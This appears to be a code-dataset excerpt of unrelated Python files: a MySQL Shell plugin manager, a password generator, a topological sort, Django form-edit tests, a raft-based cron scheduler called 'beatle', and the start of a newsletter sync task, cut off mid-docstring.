id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
1713271 | # Copyright (c) 2020, Oracle and/or its affiliates.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2.0,
# as published by the Free Software Foundation.
#
# This program is also distributed with certain software (including
# but not limited to OpenSSL) that is licensed under separate terms, as
# designated in a particular file or component or in included license
# documentation. The authors of MySQL hereby grant you an additional
# permission to link the program and your derivative works with the
# separately licensed software that they have included with MySQL.
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See
# the GNU General Public License, version 2.0, for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Plugin registration
This file is automatically loaded by the MySQL Shell at startup time.
It registers the plugin objects and then imports all sub-modules to
register the plugin object member functions.
"""
from mysqlsh.plugin_manager import plugin, plugin_function, VERSION
# Create a class representing the structure of the plugin and use the
# @register_plugin decorator to register it
# The @plugin decorator registers this class as the `plugins` global
# object in the MySQL Shell; the class body itself is intentionally empty
# because member functions are attached via @plugin_function elsewhere.
# NOTE: the shell displays this docstring as the object's help text, and
# the lowercase class name becomes the global object name — keep both.
@plugin
class plugins:
    """Plugin to manage MySQL Shell plugins

    This global object exposes a list of shell extensions
    to manage MySQL Shell plugins

    Use plugins.about() to get more information about writing
    MySQL Shell plugins.
    """
    pass
# Registered in the shell as plugins.info()
@plugin_function("plugins.info")
def info():
    """Prints basic information about the plugin manager.

    Returns:
        None
    """
    # VERSION comes from mysqlsh.plugin_manager (imported at module top)
    print(f"MySQL Shell Plugin Manager Version {VERSION}")
# Registered in the shell as plugins.version()
@plugin_function("plugins.version")
def version():
    """Returns the version number of the plugin manager.

    Returns:
        str
    """
    return VERSION
# Registered in the shell as plugins.about()
@plugin_function("plugins.about")
def about():
    """Prints detailed information about the MySQL Shell plugin support.

    Returns:
        None
    """
    # BUG FIX: this function was also named `info`, silently shadowing the
    # plugins.info() implementation defined above at module level.  The
    # shell-facing name ("plugins.about") is unchanged; only the Python
    # identifier is corrected to match it.
    print(
        """
The MySQL Shell allows extending its base functionality through the creation
of plugins.

A plugin is a folder containing the code that provides the functionality to
be made available on the MySQL Shell.

User defined plugins should be located at plugins folder at the following
paths:

- Windows: %AppData%\\MySQL\\mysqlsh\\plugins
- Others: ~/.mysqlsh/plugins

A plugin must contain an init file which is the entry point to load the
extension:

- init.js for plugins written in JavaScript.
- init.py for plugins written in Python.

On startup, the shell traverses the folders inside of the *plugins* folder
searching for the plugin init file. The init file will be loaded on the
corresponding context (JavaScript or Python).

Use Cases

The main use cases for MySQL Shell plugins include:

- Definition of shell reports to be used with the \\show and \\watch Shell
  Commands.
- Definition of new Global Objects with user defined functionality.

For additional information on shell reports execute: \\? reports

For additional information on extension objects execute: \\? extension objects
"""
    )
# Registered in the shell as plugins.list()
@plugin_function("plugins.list")
def list_plugins(**kwargs):
    """Lists all available MySQL Shell plugins.

    This function will list all available plugins in the registered
    plugin repositories. To add a new plugin repository use the
    plugins.repositories.add() function.

    Args:
        **kwargs: Optional parameters

    Keyword Args:
        return_formatted (bool): If set to true, a list object is returned.
        interactive (bool): Whether user input is accepted

    Returns:
        None or a list of dicts representing the plugins
    """
    # Import lazily so the heavy plugin machinery only loads when used.
    import mysqlsh.plugin_manager.plugins as _plugins
    return _plugins.list_plugins(**kwargs)
# Registered in the shell as plugins.install()
@plugin_function("plugins.install")
def install_plugin(name=None, **kwargs):
    """Installs a MySQL Shell plugin.

    This function downloads and installs a plugin

    Args:
        name (str): The name of the plugin.
        **kwargs: Optional parameters

    Keyword Args:
        version (str): If specified, that specific version of the plugin will
            be installed
        force_install (bool): If set to true will first remove the plugin
            if it already exists
        return_object (bool): Whether to return the object
        interactive (bool): Whether user input is accepted
        printouts (bool): Whether information should be printed
        raise_exceptions (bool): Whether exceptions are raised

    Returns:
        None or plugin information
    """
    # Import lazily so the heavy plugin machinery only loads when used.
    import mysqlsh.plugin_manager.plugins as _plugins
    return _plugins.install_plugin(name, **kwargs)
# Registered in the shell as plugins.uninstall()
@plugin_function("plugins.uninstall")
def uninstall_plugin(name=None, **kwargs):
    """Uninstalls a MySQL Shell plugin.

    This function uninstalls a plugin

    Args:
        name (str): The name of the plugin.
        **kwargs: Optional parameters

    Keyword Args:
        interactive (bool): Whether user input is accepted
        printouts (bool): Whether information should be printed
        raise_exceptions (bool): Whether exceptions are raised

    Returns:
        None or plugin information
    """
    # Import lazily so the heavy plugin machinery only loads when used.
    import mysqlsh.plugin_manager.plugins as _plugins
    return _plugins.uninstall_plugin(name, **kwargs)
# Registered in the shell as plugins.update()
@plugin_function("plugins.update")
def update_plugin(name=None, **kwargs):
    """Updates MySQL Shell plugins.

    This function updates one or all plugins

    Args:
        name (str): The name of the plugin.
        **kwargs: Optional parameters

    Keyword Args:
        interactive (bool): Whether user input is accepted
        raise_exceptions (bool): Whether exceptions are raised

    Returns:
        None or plugin information
    """
    # Import lazily so the heavy plugin machinery only loads when used.
    import mysqlsh.plugin_manager.plugins as _plugins
    return _plugins.update_plugin(name, **kwargs)
# Registered in the shell as plugins.details()
@plugin_function("plugins.details")
def plugin_details(name=None, **kwargs):
    """Gives detailed information about a MySQL Shell plugin.

    Args:
        name (str): The name of the plugin.
        **kwargs: Optional parameters

    Keyword Args:
        interactive (bool): Whether user input is accepted

    Returns:
        None or plugin information
    """
    # Import lazily so the heavy plugin machinery only loads when used.
    import mysqlsh.plugin_manager.plugins as _plugins
    return _plugins.plugin_details(name, **kwargs)
| StarcoderdataPython |
3266709 | from .llcp import LLCP
from .sample import NextReaction, NextReactionRecord, FirstReaction
from .runner import RunnerFSM
from .distributions import ExponentialDistribution, WeibullDistribution
from .distributions import GammaDistribution, UniformDistribution
from .distributions import PiecewiseLinearDistribution, PiecewiseConstantDistribution
from .point_process import poisson_point_process_2D, thomas_point_process_2D
| StarcoderdataPython |
1659634 | ###################################
# DRH Health - Password generator #
# Created by <NAME> - IT #
###################################
# Imports
import random, array, webbrowser
import PySimpleGUI as sg
# PySimpleGUI theme
#sg.theme('DarkGrey12')
# Create password pattern
# Create password pattern
def create_password(pass_length):
    """Generate a random password of *pass_length* characters.

    The result is guaranteed to contain at least one digit, one uppercase
    letter, one lowercase letter, and one symbol.  The ambiguous letters
    'l' and 'L' are deliberately excluded from the character pools.

    Args:
        pass_length (int): Total number of characters (must be >= 4 so the
            four guaranteed character classes fit).

    Returns:
        str: The generated password.

    NOTE(review): this uses the `random` module, which is not
    cryptographically secure; consider `secrets.choice` for real password
    generation.
    """
    MAX_LEN = pass_length
    DIGITS = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
    LOWCASE_CHARACTERS = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h',
                          'i', 'j', 'k', 'm', 'n', 'o', 'p', 'q',
                          'r', 's', 't', 'u', 'v', 'w', 'x', 'y',
                          'z']
    # BUG FIX: this pool previously contained a lowercase 'p' instead of
    # 'P', so 'P' could never appear in a generated password.
    UPCASE_CHARACTERS = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',
                         'I', 'J', 'K', 'M', 'N', 'O', 'P', 'Q',
                         'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
                         'Z']
    SYMBOLS = ['@', '#', '$', '%', '=', ':', '?', '.', '/', '|', '~', '>',
               '*', '(', ')', '<']
    # Combine all character arrays into a single pool
    combined_list = DIGITS + UPCASE_CHARACTERS + LOWCASE_CHARACTERS + SYMBOLS
    # Randomly select at least one character from each character set above
    rand_digit = random.choice(DIGITS)
    rand_upper = random.choice(UPCASE_CHARACTERS)
    rand_lower = random.choice(LOWCASE_CHARACTERS)
    rand_symbol = random.choice(SYMBOLS)
    # Seed the password with one character of each required class
    temp_pass = rand_digit + rand_upper + rand_lower + rand_symbol
    # Fill the remaining length from the combined pool
    for _ in range(MAX_LEN - 4):
        temp_pass = temp_pass + random.choice(combined_list)
    # Shuffle so the four guaranteed characters are not always up front.
    # FIX: array.array('u', ...) was used here; the 'u' typecode is
    # deprecated and removed in Python 3.13 — a plain list works the same.
    temp_pass_list = list(temp_pass)
    random.shuffle(temp_pass_list)
    # Return the shuffled characters joined into the final password
    return ''.join(temp_pass_list)
# Main entry point
# Main entry point
def main():
    """Build the PySimpleGUI window and run the password-generator event loop.

    Blocks until the user closes the window.  Handles four events:
    link click (opens browser), generate (fills the multiline box),
    copy (copies the selected text to the clipboard), and window close.
    """
    # Frame layout
    frame_layout = [
        [sg.Text('Choose the amount of characters to generate (16 is the default recommended size):')],
        [sg.Slider(range=(10,200), default_value=16, size=(55,10), orientation='horizontal', key='-SLIDER-')]
    ]
    # Layout
    layout = [
        [sg.Text('This tool can generate secure passwords starting from 10 to 200 characters in length.')],
        [sg.Frame('Password options', frame_layout)],
        [sg.Button('Generate password', size=(30,1), key='-GENERATE-'), sg.Button('Copy password', size=(30,1), key='-COPY-')],
        [sg.Multiline(size=(72,3), autoscroll=True, no_scrollbar=True, key='-PASSWORD-')],
        [sg.Text('Check the password strength at:'), sg.Text('https://www.security.org/how-secure-is-my-password', enable_events=True, text_color='blue', key='-LINK-')]
    ]
    # Create window pattern
    window = sg.Window('DRH Health - Password Generator', layout)
    # Loop through event handlers
    while True:
        event, values = window.read()
        if event == sg.WIN_CLOSED:
            break
        if event == '-LINK-':
            webbrowser.open(r'https://www.security.org/how-secure-is-my-password')
        if event == '-GENERATE-' and values['-SLIDER-']:
            value = int(values['-SLIDER-'])
            pass_result = create_password(value)
            window['-PASSWORD-'].update(pass_result)
            window['-GENERATE-'].update('Generate another')
        if event == '-COPY-':
            try:
                # selection_get() raises if no text is selected in the box
                text = window['-PASSWORD-'].Widget.selection_get()
                window.TKroot.clipboard_clear()
                window.TKroot.clipboard_append(text)
                window['-COPY-'].update('Password copied to clipboard!')
            # BUG FIX: was a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit; catch Exception instead.
            except Exception:
                window['-COPY-'].update('No password selected!')
    # Kill the window instance
    window.close()


# Script entry point
if __name__ == '__main__':
    main()
1695598 | from .exchangeability import exch_test
from .goodness_of_fit import gof_copula
from .radial_symmetry import rad_sym_test
| StarcoderdataPython |
1726407 | <reponame>Pysics/Algorithm
from __future__ import annotations
import copy
import networkx
def kahn_algorithm(graph: networkx.DiGraph) -> list:
    """Return a topological ordering of *graph* using Kahn's algorithm.

    The input graph is deep-copied so the caller's graph is not mutated.
    Vertices are processed FIFO, matching the original implementation's
    ordering exactly.

    Args:
        graph: A directed graph.

    Returns:
        list: Vertices in topological order.  NOTE: if the graph contains
        a cycle, the returned sequence covers only the acyclic prefix
        (fewer nodes than the graph) — the original behaved the same way.
    """
    # PERF FIX: the original used list[0] + list.remove(), an O(n) pop
    # from the front on every iteration; deque.popleft() is O(1).
    from collections import deque

    _graph = copy.deepcopy(graph)
    sequence = []
    ready = deque(v for v in _graph.nodes if _graph.in_degree(v) == 0)
    while ready:
        vertex = ready.popleft()
        sequence.append(vertex)
        # Materialize neighbors first: we remove edges while iterating.
        for node in list(_graph.neighbors(vertex)):
            _graph.remove_edge(vertex, node)
            if _graph.in_degree(node) == 0:
                ready.append(node)
    return sequence
| StarcoderdataPython |
1784592 | from setuptools import setup, find_packages
# Minimal packaging metadata for the simple_pytimer distribution;
# find_packages() discovers every package directory automatically.
setup(
    name='simple_pytimer',
    version='0.0.6',
    license='',
    packages=find_packages()
)
| StarcoderdataPython |
90774 | <gh_stars>0
from datetime import datetime, timedelta
import os
import uuid
from django.test import TestCase
from mock import MagicMock
from couchdbkit import RequestFailed
from casexml.apps.case.mock import CaseBlock
from casexml.apps.case.xml import V2
from corehq.apps.hqcase.utils import submit_case_blocks
from corehq.apps.receiverwrapper import submit_form_locally
from couchforms.models import XFormInstance, \
UnfinishedSubmissionStub
from corehq.form_processor.interfaces import FormProcessorInterface
class EditFormTest(TestCase):
    """Tests for editing (resubmitting) XForms and their case side effects.

    Resubmitting a form with the same ID deprecates the original document
    (doc_type XFormDeprecated) and replaces it with the new submission.
    """

    ID = '7H46J37FGH3'          # fixed form id shared by the paired XML fixtures
    domain = 'test-form-edits'  # test domain all submissions go to

    def tearDown(self):
        # Wipe all xforms between tests so IDs can be reused.
        FormProcessorInterface.delete_all_xforms()

    def _get_files(self):
        """Return (original, edit) raw XML bytes for the deprecation fixtures."""
        first_file = os.path.join(os.path.dirname(__file__), "data", "deprecation", "original.xml")
        edit_file = os.path.join(os.path.dirname(__file__), "data", "deprecation", "edit.xml")
        with open(first_file, "rb") as f:
            xml_data1 = f.read()
        with open(edit_file, "rb") as f:
            xml_data2 = f.read()
        return xml_data1, xml_data2

    def test_basic_edit(self):
        """Editing a form deprecates the original and keeps both payloads."""
        xml_data1, xml_data2 = self._get_files()
        yesterday = datetime.utcnow() - timedelta(days=1)

        xform = FormProcessorInterface.post_xform(xml_data1)
        self.assertEqual(self.ID, xform.id)
        self.assertEqual("XFormInstance", xform.doc_type)
        self.assertEqual("", xform.form['vitals']['height'])
        self.assertEqual("other", xform.form['assessment']['categories'])

        # post form back in time to simulate an edit
        FormProcessorInterface.update_properties(
            xform,
            domain=self.domain,
            received_on=yesterday,
        )

        xform = FormProcessorInterface.post_xform(xml_data2, domain=self.domain)
        self.assertEqual(self.ID, xform.id)
        self.assertEqual("XFormInstance", xform.doc_type)
        self.assertEqual("100", xform.form['vitals']['height'])
        self.assertEqual("Edited Baby!", xform.form['assessment']['categories'])

        # The original should now exist as a single XFormDeprecated doc
        # with a new id and the pre-edit content preserved.
        [deprecated_xform] = FormProcessorInterface.get_by_doc_type(self.domain, 'XFormDeprecated')
        self.assertEqual(self.ID, deprecated_xform.orig_id)
        self.assertNotEqual(self.ID, deprecated_xform.id)
        self.assertEqual('XFormDeprecated', deprecated_xform.doc_type)
        self.assertEqual("", deprecated_xform.form['vitals']['height'])
        self.assertEqual("other", deprecated_xform.form['assessment']['categories'])
        self.assertEqual(xform.received_on, deprecated_xform.received_on)
        self.assertEqual(xform.deprecated_form_id, deprecated_xform.id)
        self.assertTrue(xform.edited_on > deprecated_xform.received_on)
        # Both raw XML payloads remain retrievable as attachments.
        self.assertEqual(
            FormProcessorInterface.get_attachment(deprecated_xform.id, 'form.xml'),
            xml_data1
        )
        self.assertEqual(FormProcessorInterface.get_attachment(self.ID, 'form.xml'), xml_data2)

    def test_broken_save(self):
        """
        Test that if the second form submission terminates unexpectedly
        and the main form isn't saved, then there are no side effects
        such as the original having been marked as deprecated.
        """

        class BorkDB(object):
            """context manager for making a db's bulk_save temporarily fail"""
            def __init__(self, db):
                self.old = {}
                self.db = db

            def __enter__(self):
                self.old['bulk_save'] = self.db.bulk_save
                self.db.bulk_save = MagicMock(name='bulk_save',
                                              side_effect=RequestFailed())

            def __exit__(self, exc_type, exc_val, exc_tb):
                self.db.bulk_save = self.old['bulk_save']

        xforms = FormProcessorInterface.get_by_doc_type(self.domain, 'XFormInstance')
        self.assertEqual(len(xforms), 0)

        xml_data1, xml_data2 = self._get_files()

        submit_form_locally(xml_data1, self.domain)
        xform = FormProcessorInterface.get_xform(self.ID)
        self.assertEqual(self.ID, xform.id)
        self.assertEqual("XFormInstance", xform.doc_type)
        self.assertEqual(self.domain, xform.domain)
        self.assertEqual(
            UnfinishedSubmissionStub.objects.filter(xform_id=self.ID).count(),
            0
        )

        # This seems like a couch specific test util. Will likely need postgres test utils
        with BorkDB(XFormInstance.get_db()):
            with self.assertRaises(RequestFailed):
                submit_form_locally(xml_data2, self.domain)

        # it didn't go through, so make sure there are no edits still
        xforms = FormProcessorInterface.get_by_doc_type(self.domain, 'XFormDeprecated')
        self.assertEqual(len(xforms), 0)
        xform = FormProcessorInterface.get_xform(self.ID)
        self.assertIsNotNone(xform)
        # A failed save leaves exactly one unsaved submission stub behind.
        self.assertEqual(
            UnfinishedSubmissionStub.objects.filter(xform_id=self.ID,
                                                    saved=False).count(),
            1
        )
        self.assertEqual(
            UnfinishedSubmissionStub.objects.filter(xform_id=self.ID).count(),
            1
        )

    def test_case_management(self):
        """An edited form's case updates replace the original form's updates."""
        form_id = uuid.uuid4().hex
        case_id = uuid.uuid4().hex
        owner_id = uuid.uuid4().hex
        case_block = CaseBlock(
            create=True,
            case_id=case_id,
            case_type='person',
            owner_id=owner_id,
            update={
                'property': 'original value'
            }
        ).as_string()
        submit_case_blocks(case_block, domain=self.domain, form_id=form_id)

        # validate some assumptions
        case = FormProcessorInterface.get_case(case_id)
        self.assertEqual(case.type, 'person')
        self.assertEqual(case.property, 'original value')
        self.assertEqual([form_id], case.xform_ids)
        self.assertEqual(2, len(case.actions))
        for a in case.actions:
            self.assertEqual(form_id, a.xform_id)

        # submit a new form with a different case update
        case_block = CaseBlock(
            create=True,
            case_id=case_id,
            case_type='newtype',
            owner_id=owner_id,
            update={
                'property': 'edited value'
            }
        ).as_string()
        submit_case_blocks(case_block, domain=self.domain, form_id=form_id)

        case = FormProcessorInterface.get_case(case_id)
        self.assertEqual(case.type, 'newtype')
        self.assertEqual(case.property, 'edited value')
        self.assertEqual([form_id], case.xform_ids)
        self.assertEqual(2, len(case.actions))
        for a in case.actions:
            self.assertEqual(form_id, a.xform_id)

    def test_second_edit_fails(self):
        """An edit with an invalid case block becomes an XFormError."""
        form_id = uuid.uuid4().hex
        case_id = uuid.uuid4().hex
        case_block = CaseBlock(
            create=True,
            case_id=case_id,
            case_type='person',
        ).as_string()
        submit_case_blocks(case_block, domain=self.domain, form_id=form_id)

        # submit an edit form with a bad case update (for example a bad ID)
        case_block = CaseBlock(
            create=True,
            case_id='',
            case_type='person',
        ).as_string()
        submit_case_blocks(case_block, domain=self.domain, form_id=form_id)

        xform = FormProcessorInterface.get_xform(form_id)
        self.assertEqual('XFormError', xform.doc_type)

        deprecated_xform = FormProcessorInterface.get_xform(xform.deprecated_form_id)
        self.assertEqual('XFormDeprecated', deprecated_xform.doc_type)

    def test_case_management_ordering(self):
        """Editing a middle form keeps case actions in submission order."""
        case_id = uuid.uuid4().hex
        owner_id = uuid.uuid4().hex

        # create a case
        case_block = CaseBlock(
            create=True,
            case_id=case_id,
            case_type='person',
            owner_id=owner_id,
        ).as_string()
        create_form_id = submit_case_blocks(case_block, domain=self.domain)

        # validate that worked
        case = FormProcessorInterface.get_case(case_id)
        self.assertEqual([create_form_id], case.xform_ids)
        self.assertEqual([create_form_id], [a.xform_id for a in case.actions])
        for a in case.actions:
            self.assertEqual(create_form_id, a.xform_id)

        edit_date = datetime.utcnow()
        # set some property value
        case_block = CaseBlock(
            create=False,
            case_id=case_id,
            date_modified=edit_date,
            update={
                'property': 'first value',
            }
        ).as_string()
        edit_form_id = submit_case_blocks(case_block, domain=self.domain)

        # validate that worked
        case = FormProcessorInterface.get_case(case_id)
        self.assertEqual(case.property, 'first value')
        self.assertEqual([create_form_id, edit_form_id], case.xform_ids)
        self.assertEqual([create_form_id, edit_form_id], [a.xform_id for a in case.actions])

        # submit a second (new) form updating the value
        case_block = CaseBlock(
            create=False,
            case_id=case_id,
            update={
                'property': 'final value',
            }
        ).as_string()
        second_edit_form_id = submit_case_blocks(case_block, domain=self.domain)

        # validate that worked
        case = FormProcessorInterface.get_case(case_id)
        self.assertEqual(case.property, 'final value')
        self.assertEqual([create_form_id, edit_form_id, second_edit_form_id], case.xform_ids)
        self.assertEqual([create_form_id, edit_form_id, second_edit_form_id], [a.xform_id for a in
                                                                               case.actions])

        # deprecate the middle edit
        case_block = CaseBlock(
            create=False,
            case_id=case_id,
            date_modified=edit_date,  # need to use the previous edit date for action sort comparisons
            update={
                'property': 'edited value',
                'added_property': 'added value',
            }
        ).as_string()
        submit_case_blocks(case_block, domain=self.domain, form_id=edit_form_id)

        # ensure that the middle edit stays in the right place and is applied
        # before the final one
        case = FormProcessorInterface.get_case(case_id)
        self.assertEqual(case.property, 'final value')
        self.assertEqual(case.added_property, 'added value')
        self.assertEqual([create_form_id, edit_form_id, second_edit_form_id], case.xform_ids)
        self.assertEqual([create_form_id, edit_form_id, second_edit_form_id], [a.xform_id for a in
                                                                               case.actions])
| StarcoderdataPython |
3220744 | <reponame>zhebrak/beatle
import aiohttp
import argparse
import asyncio
import functools
import json
import hmac
import logging
import pytz
import raftos
import time
from configparser import ConfigParser, NoSectionError, NoOptionError
from datetime import datetime, timedelta
from logging.handlers import SysLogHandler
from crontab import CronTab
# Configure the root log file; init_logger() later adds a syslog handler too.
logging.basicConfig(
    filename='/var/log/beatle/beatle.log',
    format="[%(asctime)s] %(levelname)s %(message)s",
    level=logging.INFO
)
logger = logging.getLogger('beatle')

# Per-project defaults, overridden by the [beatle] section and each
# project's remote config.  LOOP_TIMEOUT/UPDATE_EVERY/TIMEOUT are seconds.
DEFAULT_CONFIGURATION = {
    'LOOP_TIMEOUT': 10,
    'UPDATE_EVERY': 600,
    'TIMEOUT': 5,
    'TIME_ZONE': 'Europe/Moscow'
}
class Beatle:
    """One node of the distributed cron scheduler.

    Reads an INI config, builds a Project per non-[beatle] section, and —
    once elected raft leader — periodically triggers each project's
    scheduled HTTP calls.
    """

    def __init__(self, config_path, beatle_id):
        self.id = beatle_id  # "host:port" string used as the raftos node id
        self.read_config(config_path)
        self.init_logger()

    def config_get(self, section, option, default=None):
        """Return a config value, falling back to *default* when the
        section or option is missing."""
        try:
            return self.config.get(section, option)
        except (NoSectionError, NoOptionError):
            return default

    def read_config(self, config_path):
        """Parse the INI file and build one Project per project section."""
        self.config = ConfigParser()
        self.config.read(config_path)
        self.loop_timeout = int(self.config_get('beatle', 'LOOP_TIMEOUT', 10))
        self.projects = []
        for section in self.config.sections():
            # Every section other than [beatle] describes a project.
            if section != 'beatle':
                configuration = DEFAULT_CONFIGURATION.copy()
                configuration.update({
                    'NAME': section,
                    'KEY': self.config_get(section, 'KEY'),
                    'URL': self.config_get(section, 'URL'),
                    'UPDATE_EVERY': self.config_get('beatle', 'UPDATE_EVERY', 600),
                    'TIMEOUT': self.config_get('beatle', 'TIMEOUT', 5),
                    'TIME_ZONE': self.config_get('beatle', 'TIME_ZONE', 'Europe/Moscow'),
                    'LOOP_TIMEOUT': self.loop_timeout
                })
                self.projects.append(Project(self, configuration))

    def init_logger(self):
        """Attach a syslog handler using the configured facility."""
        logger.setLevel(logging.DEBUG)
        facility = self.config_get('logging', 'facility', 'LOG_USER')
        handler = SysLogHandler(facility=getattr(SysLogHandler, facility))
        logger.addHandler(handler)

    def on_leader(self):
        # raftos callback fired when this node becomes cluster leader
        logger.info('{} is leader'.format(self.id))

    async def run(self):
        """Run event loop"""
        loop = asyncio.get_event_loop()
        while True:
            # Only the raft leader schedules calls; followers block here.
            await raftos.wait_until_leader(self.id)
            for project in self.projects:
                asyncio.ensure_future(project.call())
            await asyncio.sleep(self.loop_timeout)
class Project:
    """A single scheduled project: fetches its cron config from an HTTP
    endpoint and POSTs back to the same endpoint when tasks are due.
    """

    def __init__(self, beatle, configuration):
        self.beatle = beatle
        self.name = configuration.get('NAME')
        self.key = configuration.get('KEY')   # shared HMAC secret
        self.url = configuration.get('URL')
        # BUG FIX: was configuration.get('TIME_ZOME') — a typo that always
        # yielded None; the key written by Beatle.read_config is 'TIME_ZONE'.
        self.timezone = configuration.get('TIME_ZONE')
        self.update_every = int(configuration.get('UPDATE_EVERY'))
        self.timeout = int(configuration.get('TIMEOUT'))
        self.loop_timeout = int(configuration.get('LOOP_TIMEOUT'))
        self.last_update = None  # when the remote config was last fetched
        self.config = {}
        self.tasks = {}          # task name -> CronTab schedule

    async def get_config(self):
        """Return config from projects' HTTP endpoint"""
        if self.config_have_to_be_updated:
            # Keep the previous config if the endpoint is unreachable.
            self.config = await self._request('get') or self.config or {}
            self.tasks = {
                task: CronTab(cron_string)
                for task, cron_string in self.config.get('TASKS', {}).items()
            }
            # Remote config overrides local settings when present.
            self.timezone = self.config.get('TIME_ZONE') or self.timezone
            self.timeout = self.config.get('TIMEOUT') or self.timeout
            self.update_every = self.config.get('UPDATE_EVERY') or self.update_every
            self.last_update = datetime.now()

    @property
    def timezone_aware_now(self):
        """Current time in the project's timezone (naive local time on a
        bad timezone name)."""
        # BUG FIX: the original had `finally: return datetime.now()`, which
        # unconditionally overrode the timezone-aware return value in the
        # `try` block, so a naive local time was always returned.
        try:
            return datetime.now(pytz.timezone(self.timezone))
        except pytz.exceptions.UnknownTimeZoneError:
            logger.exception('Wrong timezone provided for {}'.format(self.name))
            return datetime.now()

    @property
    def config_have_to_be_updated(self):
        """True when the remote config is stale and should be re-fetched."""
        if self.last_update is None:
            return True
        # BUG FIX: timedelta(x) means x *days*; UPDATE_EVERY is in seconds
        # (default 600), so the config was effectively never refreshed.
        return self.last_update < datetime.now() - timedelta(seconds=self.update_every)

    async def call(self):
        """POST to HTTP endpoint if needed"""
        await self.get_config()
        for task_name, cron in self.tasks.items():
            time_left = cron.next(now=self.timezone_aware_now)
            # Only schedule tasks that fire before the next scheduler tick.
            if time_left < self.loop_timeout:
                asyncio.ensure_future(
                    self._call_later(
                        time_left,
                        self._request('post', data={'TASK': task_name})
                    )
                )

    @staticmethod
    async def _call_later(time_left, coroutine):
        # Delay firing the request until the task's exact due time.
        await asyncio.sleep(time_left)
        await coroutine

    async def _request(self, method, data=None, params=None):
        """Perform a signed GET/POST against the project endpoint and
        return its JSON body (None on non-200)."""
        if params is None:
            params = {}
        params.update({'SIGNATURE': self._get_signature(data)})
        start = time.time()
        result = None
        async with aiohttp.ClientSession() as session:
            request = getattr(session, method)
            async with request(self.url, data=data, params=params, timeout=self.timeout) as r:
                if r.status == 200:
                    result = await r.json()
                log_map = {
                    'URL': self.url,
                    'Data': json.dumps(data),
                    'Time': str(time.time() - start),
                    'Status': str(r.status),
                    'Response': json.dumps(result)
                }
                message = '\n'.join([': '.join([key, value]) for key, value in log_map.items()])
                logger.info('\n' + message + '\n')
        return result

    def _get_signature(self, params=None):
        """HMAC signature over the sorted stringified param values."""
        if params is None:
            params = {}
        msg = ''.join(map(str, sorted(params.values()))).encode()
        # BUG FIX: digestmod is mandatory since Python 3.8 (TypeError
        # otherwise).  MD5 matches the implicit pre-3.8 default, so
        # existing endpoints keep verifying signatures unchanged.
        return hmac.new(self.key.encode(), msg=msg, digestmod='md5').hexdigest()
# CLI entry point: --conf INI path, --node local port, --cluster space-
# separated list of peer ports (all assumed to be on 127.0.0.1).
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--conf')
    parser.add_argument('--node')
    parser.add_argument('--cluster')
    args = parser.parse_args()

    cluster = ['127.0.0.1:{}'.format(port) for port in args.cluster.split()]
    node = '127.0.0.1:{}'.format(args.node)
    beatle = Beatle(config_path=args.conf, beatle_id=node)
    logger.info('Starting beatle node: {}'.format(node))
    loop = asyncio.get_event_loop()
    # Join the raft cluster, then run the scheduler loop forever.
    loop.create_task(raftos.register(node, cluster=cluster))
    raftos.configure({
        'log_path': '/var/log/beatle/',
        'serializer': raftos.serializers.JSONSerializer,
        'on_leader': beatle.on_leader
    })
    loop.run_until_complete(beatle.run())
23058 | # Generated by Django 3.0.2 on 2020-01-31 20:33
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: updates help_text/verbose_name metadata on
    Collection fields (comment, expired_on, public, query) — no schema change.
    """

    dependencies = [
        ('collections', '0002_auto_20200109_1348'),
    ]

    operations = [
        migrations.AlterField(
            model_name='collection',
            name='comment',
            field=models.CharField(help_text='Comment for collection.', max_length=256, verbose_name='Comment'),
        ),
        migrations.AlterField(
            model_name='collection',
            name='expired_on',
            field=models.DateTimeField(help_text='An expiration date of collection.', verbose_name='An expiration date'),
        ),
        migrations.AlterField(
            model_name='collection',
            name='public',
            field=models.BooleanField(default=False, help_text='Make public.', verbose_name='Public'),
        ),
        migrations.AlterField(
            model_name='collection',
            name='query',
            field=models.CharField(help_text='Query for collection.', max_length=256, verbose_name='Query'),
        ),
    ]
| StarcoderdataPython |
38796 | <filename>ecosante/newsletter/tasks/import_in_sb.py
from flask import current_app
from datetime import datetime
from uuid import uuid4
import os
from flask.helpers import url_for
import sib_api_v3_sdk
from sib_api_v3_sdk.rest import ApiException
from ecosante.newsletter.models import Newsletter, NewsletterDB, Inscription
from ecosante.extensions import db, sib, celery
from ecosante.utils import send_log_mail
def get_all_contacts(limit=100):
    """Fetch every contact from SendinBlue, paging *limit* at a time.

    Args:
        limit (int): Page size for each API request.

    Returns:
        list: All contact dicts across all pages.
    """
    contacts_api = sib_api_v3_sdk.ContactsApi(sib)
    contacts = []
    offset = 0
    while True:
        # BUG FIX: the page size was hardcoded to 100 here while the loop
        # condition and offset use the `limit` parameter; any call with
        # limit != 100 would terminate early or loop incorrectly.
        result = contacts_api.get_contacts(limit=limit, offset=offset)
        contacts += result.contacts
        # A short page means we've reached the last one.
        if len(result.contacts) < limit:
            break
        offset += limit
    return contacts
def get_blacklisted_contacts():
    """Return every SendinBlue contact whose email is blacklisted."""
    blacklisted = []
    for contact in get_all_contacts():
        if contact['emailBlacklisted']:
            blacklisted.append(contact)
    return blacklisted
def deactivate_contacts():
    """Unsubscribe local Inscription rows whose SendinBlue contact is
    blacklisted, keeping the local DB in sync with SIB opt-outs."""
    for contact in get_blacklisted_contacts():
        db_contact = Inscription.active_query().filter(Inscription.mail==contact['email']).first()
        # Skip contacts with no matching active local subscription.
        if not db_contact or not db_contact.is_active:
            continue
        db_contact.unsubscribe()
def import_and_send(task, seed, preferred_reco, remove_reco, only_to, force_send=False):
    """Full newsletter pipeline: sync unsubscribes, delete stale SIB lists,
    build the newsletters, then hand off to import_() for list upload.

    Args:
        task: Celery task used to report progress via update_state().
